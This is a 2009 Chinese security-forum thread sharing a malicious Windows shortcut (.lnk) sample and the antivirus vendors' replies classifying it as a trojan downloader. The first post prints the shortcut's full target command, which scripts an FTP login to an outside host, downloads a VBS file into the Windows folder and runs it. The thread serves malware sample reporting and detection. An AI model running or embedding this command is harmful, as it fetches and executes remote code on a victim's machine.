查看: 3055|回复: 8
收起左侧

[病毒样本] 转来一个特别有意思的东东(lnk病毒 新增一只)

[复制链接]
jijiasd
发表于 2009-1-15 11:41:28 | 显示全部楼层 |阅读模式
压缩时档名自动变成cmd,即使你上传到virus total,一样会自动变成cmd.exe,除非不再windows系统下.

问题出在这个副档名lnk,不管压缩或上传都会指向c:\windows\system32\cmd.exe


把这个档案"->按右键内容->目标栏里就可以看到问题所在

%windir%\system32\cmd.exe /c echo open www.as02.com>>a.t&echo as02>>a.t&echo 111>>a.t&echo get jnk %windir%\nk.vbs>>a.t&echo bye >>a.t&ftp -s:a.t&del a.t&start %windir%\nk.vbs& (卡巴正在全面分析ftp)


lnk病毒,卡巴工程师分析特征名为:Trojan-Downloader.Win32.Pif.gw



[ 本帖最后由 jijiasd 于 2009-1-15 17:42 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jijiasd
 楼主| 发表于 2009-1-15 11:44:28 | 显示全部楼层
TO KL卡巴和红伞
IllusionWing
发表于 2009-1-15 11:45:02 | 显示全部楼层
正在登陆ftp..
Palkia
发表于 2009-1-15 11:51:04 | 显示全部楼层
rs 0
tgzw1680
发表于 2009-1-15 12:11:31 | 显示全部楼层
费尔清空
zdlzp
发表于 2009-1-15 12:50:17 | 显示全部楼层
是什么?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jijiasd
 楼主| 发表于 2009-1-15 13:27:00 | 显示全部楼层
尊敬的用户,您好!


1.lnk

以上文件中包含恶意代码,正在处理中,请您注意及时更新病毒库查杀。



非常感谢您向我们提供可疑文件样本,有了您的支持我们将做得更好。
  

感谢您对卡巴斯基的信任与支持!
我们诚恳地希望您来电或来信寻求关于产品的技术支持服务,如果您有关于卡巴斯基公司的合理化建议也希望您与我们联系。
24小时技术支持热线400-611-6633
中文主页:http://www.kaspersky.com.cn/
技术支持邮箱:support@kaspersky.com.cn
病毒上报邮箱:virus@kaspersky.com.cn

卡巴斯基中国技术服务中心 399号工程师为您服务
08红伞威点
发表于 2009-1-15 17:38:58 | 显示全部楼层
File ID  Filename Size (Byte) Result
25232608  文件x2.rar 4.79 KB OK
25232467  ###########x#W#n#...##.eml 7.43 KB OK

A listing of files contained inside archives alongside their results can be found below:

File ID  Filename Size (Byte) Result
25232518  ###{######-#n####.lnk  1.92 KB  UNDER ANALYSIS


Please find a detailed report concerning each individual sample below:

Filename Result
###{######-#n####.lnk  UNDER ANALYSIS
------------------------------------------------------------------------------------------------------------------
to Avira。
08红伞威点
发表于 2009-1-15 22:13:25 | 显示全部楼层
File ID  Filename Size (Byte) Result
25232608  文件x2.rar 4.79 KB OK
25232467  ###########x#W#n#...##.eml 7.43 KB OK

A listing of files contained inside archives alongside their results can be found below:

File ID  Filename Size (Byte) Result
25232518  ###{######-#n####.lnk  1.92 KB  MALWARE


Please find a detailed report concerning each individual sample below:

Filename Result
###{######-#n####.lnk  MALWARE

The file '###{######-#n####.lnk' has been determined to be 'MALWARE'. Our analysts discovered that the file is a Trojan. In general this kind of programs contains harmful functionality called payload. Detection will be added to our virus definition file (VDF) with one of the next updates.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-20 15:27 , Processed in 0.121838 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表